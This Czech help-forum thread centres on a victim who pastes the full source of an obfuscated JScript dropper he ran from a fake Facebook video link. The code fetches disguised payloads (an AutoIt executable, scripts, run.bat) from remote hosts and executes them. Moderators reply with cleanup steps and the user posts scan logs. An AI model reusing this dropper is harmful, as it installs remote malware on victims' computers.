JavaScript - stažený z facebooku

Místo pro vaše HiJackThis logy a logy z dalších programů…

Moderátoři: Mods_senior, Security team

Uživatelský avatar
eda220
Level 3.5
Level 3.5
Příspěvky: 724
Registrován: leden 12
Pohlaví: Muž
Stav:
Offline
Kontakt:

JavaScript - stažený z facebooku

Příspěvekod eda220 » 03 led 2016 17:09

Zdravím,
nevím jestli už je to tu známá věc, ale na facebook někdo sdílel odkaz, který vypadal jako video, po kliknutí se mi stáhnul soubor a já blbec jsem ho spustil, než jsem něco přečetl. Ukázalo se, že to je javascript, dvakrát mi zapl chrome a pak zase vypl a nic "viditelného" nedělá. Tady máte kód, já se v tom moc nevyznám. Co jsem kdyžtak způsobil a jak se toho zbavit? Děkuji

Kód: Vybrat vše

var window=this;!function(r){function n(r,n){if(!n||!r)return null;n=K[function(){var r="nmentStrings",n="ndEnviro",o="Expa";return o+n+r}()](n);var o=window[String.fromCharCode(87,J,99,114,105,q,116)][String.fromCharCode(67,114,U,97,116,101,79,R,106,M,G,Z)](String.fromCharCode(77,W,120,V,Q,50,I,88,77,76,104,Z,H,_));o[function(){var r=P,n="statechang",o="onready";return o+n+r}()]=function(){o[function(){var r="tate",n="readyS";return n+r}()]==="TZUk".length&&200===o[function(){var r="tus",n=B,o="t",t=T;return t+o+n+r}()]&&(window[String.fromCharCode(F,y)]=new ActiveXObject(function(){var r="ream",n="DODB.St",o="A";return o+n+r}()),window[String.fromCharCode(F,x)][function(){var r="n",n=P,o="p",t="o";return t+o+n+r}()](),window[function(){var r=B,n=E;return n+r}()][String.fromCharCode(Z,121,112,M)]="z".length,window[String.fromCharCode(120,y)][String.fromCharCode(119,X,105,Z,101)](o[function(){var r="ody",n="B",o=P,t="Respons";return t+o+n+r}()]),window[String.fromCharCode(120,x)][String.fromCharCode(_,D,115,O,Z,105,111,110)]=10206,window[function(){var r="2",n="stm";return n+r}()]=new ActiveXObject(String.fromCharCode(65,68,79,68,66,46,83,H,114,101,x,k)),window[String.fromCharCode(115,H,V,50)][function(){var r=P,n="typ";return n+r}()]="c".length,window[String.fromCharCode(j,Z,V,50)][String.fromCharCode(D,_,M,z)](),window[String.fromCharCode(115,Z,109,50)][function(){var r=P,n="t",o="wri";return o+n+r}()](window[String.fromCharCode(F,97)][String.fromCharCode(X,U,x,100)]()),window[String.fromCharCode(115,H,k,50)][String.fromCharCode(W,y,118,M,84,A,70,b,p,M)](n,"He".length),window[function(){var r="2",n="tm",o=T;return o+n+r}()][String.fromCharCode(99,Q,A,115,U)](),window[function(){var r=B,n=E;return n+r}()][String.fromCharCode(G,Q,111,115,101)]())},o[String.fromCharCode(A,_,M,110)](function(){var r="T",n="E",o="G";return o+n+r}(),r,!1),o[function(){var r="d",n="n",o="se";return o+n+r}()](null)}function o(r,n){window[String.fromCharCode(F,97)]=new ActiveXObject(function(){var r=l,n=B,o=".Stre",t="DB",i="ADO";return i+t+o+n+r}()),window[function(){var r=B,n=E;return n+r}()][String.fromCharCode(111,112,M,z)](),window[String.fromCharCode(120,x)][String.fromCharCode(Z,121,_,101)]="v".length,window[function(){var r=B,n=E;return n+r}()][String.fromCharCode(76,111,y,100,70,X,A,109,70,b,Q,U)](r),window[function(){var r=E,n="i";return n+r}()]=new ActiveXObject(String.fromCharCode(65,68,79,68,66,s,83,116,X,101,97,109)),window[function(){var r=E,n="i";return n+r}()][function(){var r="n",n=P,o="op";return o+n+r}()](),window[String.fromCharCode(O,120)][String.fromCharCode(H,121,q,M)]="V".length,window[String.fromCharCode(b,120)][String.fromCharCode(76,111,x,100,70,114,A,109,70,105,Q,M)](n),window[function(){var r="tm2",n=T;return n+r}()]=new ActiveXObject(String.fromCharCode(65,68,79,68,66,I,83,116,v,101,97,109)),window[function(){var r="2",n="tm",o=T;return o+n+r}()][String.fromCharCode(H,121,_,M)]="o".length,window[String.fromCharCode(j,116,V,50)][String.fromCharCode(D,112,M,110)](),window[String.fromCharCode(115,116,V,50)][String.fromCharCode(119,114,O,Z,U)](window[function(){var r=E,n="i";return n+r}()][function(){var r="d",n="ea",o="r";return o+n+r}()]()),window[String.fromCharCode(j,116,k,50)][String.fromCharCode(119,v,O,Z,M)](window[String.fromCharCode(120,x)][String.fromCharCode(v,101,y,100)]()),window[String.fromCharCode(120,97)][function(){var r="ose",n="l",o="c";return o+n+r}()](),window[String.fromCharCode(105,120)][String.fromCharCode(99,p,111,W,101)](),window[function(){var r="2",n="stm";return n+r}()][function(){var r=P,n="Fil",o="saveTo";return o+n+r}()](r,"ZP".length),window[String.fromCharCode(j,H,109,50)][String.fromCharCode(G,108,D,j,101)]()}var t="mozkl",i="asor",e=92,a=106,C=103,f="https:",d=107,u=122,w=117,h=49,g=52,m=102,S="ozkla",c="sor",v=114,s=46,l="m",p=108,b=105,A=111,z=110,j=115,k=109,O=105,D=111,X=114,E="x",x=97,y=97,F=120,T="s",B="a",P="e",_=112,H=116,I=46,Q=108,V=109,W=115,Z=116,G=99,M=101,R=98,U=101,q=112,J=83;window[String.fromCharCode(102,j,111)]=new ActiveXObject(String.fromCharCode(J,99,v,O,q,H,105,110,103,I,70,O,108,M,J,121,j,Z,M,109,79,R,106,M,G,H));var K=new ActiveXObject(String.fromCharCode(87,83,G,X,105,q,116,I,J,104,M,p,p));r=new ActiveXObject(function(){var r="ation",n="Applic",o="ell.",t="Sh";return t+o+n+r}()),window[function(){var r="str",n="eDe",o="l",t="i",i="F";return i+t+o+n+r}()]=K[function(){var r="entStrings",n="ndEnvironm",o="pa",t="Ex";return t+o+n+r}()](function(){var r="%\\",n="ATA",o="%APPD";return o+n+r}()),window[function(){var r=c,n=S,o=l;return o+n+r}()]=window[function(){var r="Destr",n="File";return n+r}()]+function(){var r=B,n="il",o="Moz";return o+n+r}(),window[String.fromCharCode(m,115,D)][String.fromCharCode(70,111,p,100,101,v,69,F,105,115,Z,W)](window[function(){var r="lasor",n="mozk";return n+r}()])||window[function(){var r="o",n=T,o="f";return o+n+r}()][function(){var r="older",n="CreateF";return n+r}()](window[function(){var r="r",n="laso",o="ozk",t=l;return t+o+n+r}()]),r[String.fromCharCode(J,104,M,p,Q,69,F,101,99,117,H,101)](function(){var r="iQ",n="I",o="l/QEa",t="oo.g",i="https://g";return i+t+o+n+r}()),window[String.fromCharCode(115,y,98,b,116,116,117,V,98)]=String.fromCharCode(46,109,U,100,105,97,I,Z,117,k,98,108,114,46,G,D,109,47,g,55,100,49,99,m,50,g,48,100,53,x,50,98,102,50,h,51,56,51,57,m,y,51,98,98,54,49,m,51,49,y,47,H,w,k,98,108,v,95,z),n(function(){var r="/36",n="tps:/",o="ht";return o+n+r}()+window[function(){var r="mb",n="u",o="t",t="sabit";return t+o+n+r}()]+function(){var r="pg",n="ui8al4o1_400.j",o="w9rw6Wltk1";return o+n+r}(),window[String.fromCharCode(k,111,u,d,p,y,W,D,v)]+function(){var r="t.exe",n="\\Autoi";return n+r}()),n(function(){var r="0",n="ps://4",o="htt";return o+n+r}()+window[String.fromCharCode(j,97,98,b,Z,Z,w,k,98)]+function(){var r="r9o1_400.jpg",n="z7vif1npH1v1y9";return n+r}(),window[String.fromCharCode(109,A,u,107,108,y,j,A,v)]+String.fromCharCode(92,98,103,s,104,H,V,p)),n(function(){var r="0",n="/4",o="/",t=f;return t+o+n+r}()+window[String.fromCharCode(115,x,98,105,116,H,w,k,98)]+function(){var r="_400.jpg",n="1",o="l4o",t="w9s9iWADO1ui8a";return t+o+n+r}(),window[String.fromCharCode(109,111,u,107,Q,y,W,A,114)]+String.fromCharCode(92,M,107,p,46,y,w,51)),n(function(){var r="41",n="//",o=f;return o+n+r}()+window[function(){var r="umb",n="bitt",o="sa";return o+n+r}()]+String.fromCharCode(119,57,j,98,U,49,76,83,83,h,117,105,56,x,p,g,111,49,95,g,48,48,46,106,_,C),window[function(){var r="r",n="klaso",o="moz";return o+n+r}()]+function(){var r="p",n="zi",o="\\ff.";return o+n+r}()),n(String.fromCharCode(104,116,Z,q,j,58,47,47,g,49)+window[function(){var r="b",n="tum",o="sabit";return o+n+r}()]+String.fromCharCode(119,R,122,50,52,105,80,83,70,49,117,O,56,x,p,52,A,49,95,g,48,48,I,a,q,103),window[function(){var r=c,n=S,o=l;return o+n+r}()]+function(){var r="u3",n="e.a",o="rc",t="\\fo";return t+o+n+r}()),n(String.fromCharCode(104,116,H,112,W,58,47,47,52,48)+window[String.fromCharCode(j,x,98,O,116,H,w,109,98)]+String.fromCharCode(119,57,j,C,O,78,81,57,112,49,117,105,56,97,Q,52,A,h,95,52,48,48,s,a,q,103),window[String.fromCharCode(V,111,122,d,p,x,j,111,v)]+String.fromCharCode(e,v,101,C,I,97,117,51)),n(function(){var r="40",n="/",o="tps:/",t="ht";return t+o+n+r}()+window[String.fromCharCode(115,97,R,b,H,Z,w,109,98)]+String.fromCharCode(119,57,j,b,105,67,F,k,74,49,117,O,56,y,Q,52,A,49,95,g,48,48,46,106,_,C),window[function(){var r="or",n=T,o=S,t=l;return t+o+n+r}()]+function(){var r="u3",n=B,o="t.",t="\\sabi";return t+o+n+r}()),n(function(){var r="6",n="//3",o="tps:",t="t",i="h";return i+t+o+n+r}()+window[String.fromCharCode(j,97,R,O,H,116,117,109,R)]+String.fromCharCode(122,55,118,O,m,49,z,112,72,49,118,49,121,57,v,57,111,51,95,52,48,48,46,106,q,103),window[function(){var r=i,n="l",o="mozk";return o+n+r}()]+String.fromCharCode(92,117,112,46,y,117,51)),n(function(){var r="6",n="/3",o="/",t=f;return t+o+n+r}()+window[String.fromCharCode(115,y,98,105,H,116,117,k,R)]+String.fromCharCode(122,55,118,105,102,49,z,q,72,49,118,h,121,57,114,57,111,50,95,g,48,48,I,106,112,103),window[String.fromCharCode(V,A,122,d,p,y,W,111,v)]+String.fromCharCode(e,k,y,110,105,m,U,j,116,46,a,j,A,110)),n(String.fromCharCode(104,116,H,_,115,58,47,47,g,49)+window[String.fromCharCode(115,x,R,b,Z,Z,w,k,R)]+String.fromCharCode(119,103,113,102,X,83,u,56,50,h,117,b,56,y,Q,g,D,h,95,52,48,48,I,a,q,103),window[String.fromCharCode(k,D,122,107,p,y,j,A,114)]+String.fromCharCode(92,114,w,z,s,98,y,Z)),o(window[function(){var r="r",n="o",o=T,i=B,e=t;return e+i+o+n+r}()]+String.fromCharCode(92,117,_,I,y,117,51),window[String.fromCharCode(k,D,122,107,p,x,j,D,114)]+String.fromCharCode(92,W,x,98,105,116,I,y,w,51)),o(window[function(){var r=c,n=B,o=t;return o+n+r}()]+String.fromCharCode(e,m,111,114,99,U,s,97,117,51),window[function(){var r=c,n=S,o=l;return o+n+r}()]+String.fromCharCode(e,W,97,98,b,H,I,y,w,51)),o(window[function(){var r=i,n=t;return n+r}()]+String.fromCharCode(92,v,U,103,s,x,117,51),window[function(){var r=i,n=t;return n+r}()]+function(){var r="au3",n=".",o="t",t="\\sabi";return t+o+n+r}()),o(window[function(){var r="or",n="zklas",o="mo";return o+n+r}()]+function(){var r=".au3",n="\\ekl";return n+r}(),window[function(){var r="r",n="o",o="las",t="k",i="z",e="o",a=l;return a+e+i+t+o+n+r}()]+function(){var r="3",n="u",o="abit.a",t="\\s";return t+o+n+r}()),r[function(){var r="ecute",n="ShellEx";return n+r}()](window[String.fromCharCode(109,111,u,107,p,x,115,111,X)]+String.fromCharCode(92,114,w,110,46,98,97,H),"",window[String.fromCharCode(V,D,122,d,Q,97,115,111,114)],"","sxVItgis".length-8)}(this);
Notebook : Intel Core i3 3110M 2.4 GHz | RAM 6GB | LENOVO G500 | AMD Radeon HD 8750M 2GB | Win 10 Pro 64-bit

Reklama
Uživatelský avatar
jerabina
člen Security týmu
Level 6
Level 6
Příspěvky: 3647
Registrován: březen 13
Bydliště: Litoměřice
Pohlaví: Muž
Stav:
Offline

Re: JavaScript - stažený z facebooku

Příspěvekod jerabina » 03 led 2016 21:23

Mrkneme na to, z toho skriptu bohužel nepoznám o co se jedná.

Stáhni si ATF Cleaner
Poklepej na ATF Cleaner.exe, klikni na select all found, poté:
-Když používáš Firefox (Mozzila), klikni na Firefox nahoře a vyber: Select All, poté klikni na Empty Selected.
-Když používáš Operu, klikni nahoře na Operu a vyber: Select All, poté klikni na Empty Selected. Poté klikni na Main (hlavní stránku ) a klikni na Empty Selected.
Po vyčištění klikni na Exit k zavření programu.
ATF-Cleaner je jednoduchý nástroj na odstranění historie z webového prohlížeče. Program dokáže odstranit cache, cookies, historii a další stopy po surfování na Internetu. Mezi podporované prohlížeče patří Internet Explorer, Firefox a Opera. Aplikace navíc umí odstranit dočasné soubory Windows, vysypat koš atd.

- Pokud používáš jen Google Chrome , tak ATF nemusíš použít.

===================================================

Stáhni si TFC
Otevři soubor a zavři všechny ostatní okna, Klikni na Start k zahájení procesu. Program by neměl trvat dlouho.
Poté by se měl PC restartovat, pokud ne , proveď sám.

===================================================

Stáhni AdwCleaner (by Xplode)

Ulož si ho na svojí plochu
Ukonči všechny programy , okna a prohlížeče
Spusť program poklepáním a klikni na „Prohledat-Scan“
Po skenu se objeví log ( jinak je uložen systémovem disku jako AdwCleaner[R?].txt), jeho obsah sem celý vlož.

===================================================

Stáhni si Malwarebytes' Anti-Malware
- Při instalaci odeber zatržítko u „Povolit bezplatnou zkušební verzi Malwarebytes' Anti-Malware Premium“
Nainstaluj a spusť ho
- na konci instalace se ujisti že máš zvoleny/zatrhnuty obě možnosti:
Aktualizace Malwarebytes' Anti-Malware a Spustit aplikaci Malwarebytes' Anti-Malware, pokud jo tak klikni na tlačítko konec
- pokud bude nalezena aktualizace, tak se stáhne a nainstaluje
- program se po té spustí a klikni na Skenovat nyní a
- po proběhnutí programu se ti objeví hláška vpravo dole tak klikni na Kopírovat do schránky a a vlož sem celý log.

- po té klikni na tlačítko Exit, objeví se ti hláška tak zvol Ano
(zatím nic nemaž!).

Pokud budou problémy , spusť v nouz. režimu.
Když nevíš jak dál, přichází na řadu prostudovat manuál!
HJT návod

Pokud neodpovídám do vašich témat v sekci HJT když jsem online, tak je to jen proto, že jsem na mobilu kde je studování logů a psaní skriptů nemožné. Neberte to tedy prosím jako ignoraci.

Uživatelský avatar
eda220
Level 3.5
Level 3.5
Příspěvky: 724
Registrován: leden 12
Pohlaví: Muž
Stav:
Offline
Kontakt:

Re: JavaScript - stažený z facebooku

Příspěvekod eda220 » 04 led 2016 17:26

Adw Cleaner log:

Folder Found : C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultExtensionsokanipcmceoeemlbjnmnbdibhgpbllgc

***** [ Files ] *****

File Found : C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultlocal storagehxxp_www.azlyrics.com_0.localstorage
File Found : C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultlocal storagehxxp_www.azlyrics.com_0.localstorage-journal
File Found : C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultlocal storagehxxp_www.metrolyrics.com_0.localstorage
File Found : C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultlocal storagehxxp_www.metrolyrics.com_0.localstorage-journal

***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

Key Found : HKCUSoftwareConduit
Key Found : HKLMSOFTWAREConduit

***** [ Web browsers ] *****

[C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultWeb data] [Search Provider] Found : conduit.search
[C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultWeb data] [Search Provider] Found : aol.com
[C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultWeb data] [Search Provider] Found : ask.com
[C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultWeb data] [Search Provider] Found : starship-troopers.en.softonic.com
[C:UsersEdaAppDataLocalGoogleChromeUser DataDefaultSecure Preferences] [Extension] Found : okanipcmceoeemlbjnmnbdibhgpbllgc

########## EOF - C:AdwCleanerAdwCleaner[S1].txt - [1870 bytes] ##########


Dodatečně přidáno po 18 minutách 45 vteřinách:
Malwarebytes log:

Malwarebytes Anti-Malware
http://www.malwarebytes.org

Datum skenování: 4.1.2016
Čas skenování: 17:35:02
Protokol:
Správce: Ano

Verze: 2.01.4.1018
Databáze malwaru: v2016.01.04.03
Databáze rootkitů: v2015.12.26.01
Licence: Zkušební verze
Ochrana proti malwaru: Zapnuto
Ochrana proti škodlivým webovým stránkám: Zapnuto
Ochrana programu: Vypnuto

OS: Windows 7 Service Pack 1
CPU: x64
Souborový systém: NTFS
Uživatel: Eda

Typ skenu: Sken hrozeb
Výsledek: Dokončeno
Prohledaných objektů: 346818
Uplynulý čas: 8 min, 25 sek

Paměť: Zapnuto
Po spuštění: Zapnuto
Souborový systém: Zapnuto
Archivy: Zapnuto
Rootkity: Vypnuto
Heuristika: Zapnuto
PUP: Zapnuto
PUM: Zapnuto

Procesy: 0
(Nenalezeny žádné škodlivé položky)

Moduly: 0
(Nenalezeny žádné škodlivé položky)

Klíče registru: 3
PUM.Optional.DisableChromeUpdates, HKLMSOFTWAREPOLICIESGOOGLEUPDATE, , [22818aab7623989ee8807c928084de22],
PUM.Optional.DisableChromeUpdates, HKLMSOFTWAREWOW6432NODEPOLICIESGOOGLEUPDATE, , [2a7938fd05945adcb8b08f7fad579070],
PUP.Optional.ConduitTB.Gen, HKUS-1-5-21-3011315753-2886982797-408073045-1000SOFTWARECONDUITDistributionEngine, , [2b78c66fdebb75c13abc9cf346bd2ed2],

Hodnoty registru: 2
PUM.Optional.DisableChromeUpdates, HKLMSOFTWAREPOLICIESGOOGLEUPDATE|DisableAutoUpdateChecksCheckboxValue, 1, , [22818aab7623989ee8807c928084de22]
PUM.Optional.DisableChromeUpdates, HKLMSOFTWAREWOW6432NODEPOLICIESGOOGLEUPDATE|DisableAutoUpdateChecksCheckboxValue, 1, , [2a7938fd05945adcb8b08f7fad579070]

Data registru: 0
(Nenalezeny žádné škodlivé položky)

Složky: 0
(Nenalezeny žádné škodlivé položky)

Soubory: 0
(Nenalezeny žádné škodlivé položky)

Fyzické sektory: 0
(Nenalezeny žádné škodlivé položky)


(end)
Notebook : Intel Core i3 3110M 2.4 GHz | RAM 6GB | LENOVO G500 | AMD Radeon HD 8750M 2GB | Win 10 Pro 64-bit

Uživatelský avatar
jaro3
člen Security týmu
Guru Level 15
Guru Level 15
Příspěvky: 43298
Registrován: červen 07
Bydliště: Jižní Čechy
Pohlaví: Muž
Stav:
Offline

Re: JavaScript - stažený z facebooku

Příspěvekod jaro3 » 05 led 2016 10:10

Vlož log z HJT:
viewtopic.php?f=70&t=5119

Spusť znovu AdwCleaner (u Windows Vista či Windows7, klikni na AdwCleaner pravým a vyber „Spustit jako správce
klikni na „Prohledat-Scan“, po prohledání klikni na „ Cleaning (Vymazat)

Program provede opravu, po automatickém restartu neukáže log (C:\AdwCleaner [C?].txt) , jeho obsah sem celý vlož.

Stáhni si Junkware Removal Tool by Thisisu
http://www.bleepingcomputer.com/downloa ... oval-tool/
na svojí plochu.

Deaktivuj si svůj antivirový program. Pravým tl. myši klikni na JRT.exe a vyber „spustit jako správce“. Pro pokračování budeš vyzván ke stisknutí jakékoliv klávesy. Na nějakou klikni.
Začne skenování programu. Skenování může trvat dloho , podle množství nákaz. Po ukončení skenu se objeví log (JRT.txt) , který se uloží na ploše.
Zkopíruj sem prosím celý jeho obsah.

. spusť znovu Malwarebytes' Anti-Malware a dej Skenovat nyní
- po proběhnutí programu se ti objeví hláška tak klikni na „Vše do karantény(smazat vybrané)“ a na „Exportovat záznam“ a vyber „textový soubor“ , soubor nějak pojmenuj a někam ho ulož. Zkopíruj se celý obsah toho logu.

Stáhni si RogueKiller by Adlice Software
32bit.:
http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe
64bit.:
http://www.sur-la-toile.com/RogueKiller ... lerX64.exe
na svojí plochu.
- Zavři všechny ostatní programy a prohlížeče.
- Pro OS Vista a win7 spusť program RogueKiller.exe jako správce , u XP poklepáním.
- počkej až skončí Prescan -vyhledávání škodlivých procesů.
-Potom klikni na „Prohledat“.
- Program skenuje procesy PC. Po proskenování klikni na „Zpráva“ , v okně na pak na „Open TXT“ a celý obsah logu sem zkopíruj.
Pokud je program blokován , zkus ho spustit několikrát. Pokud dále program nepůjde spustit a pracovat, přejmenuj ho na winlogon.exe.
Při práci s programy HJT, ComboFix,MbAM, SDFix aj. zavřete všechny ostatní aplikace a prohlížeče!
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra


Zpět na “HiJackThis”

Kdo je online

Uživatelé prohlížející si toto fórum: Žádní registrovaní uživatelé a 78 hostů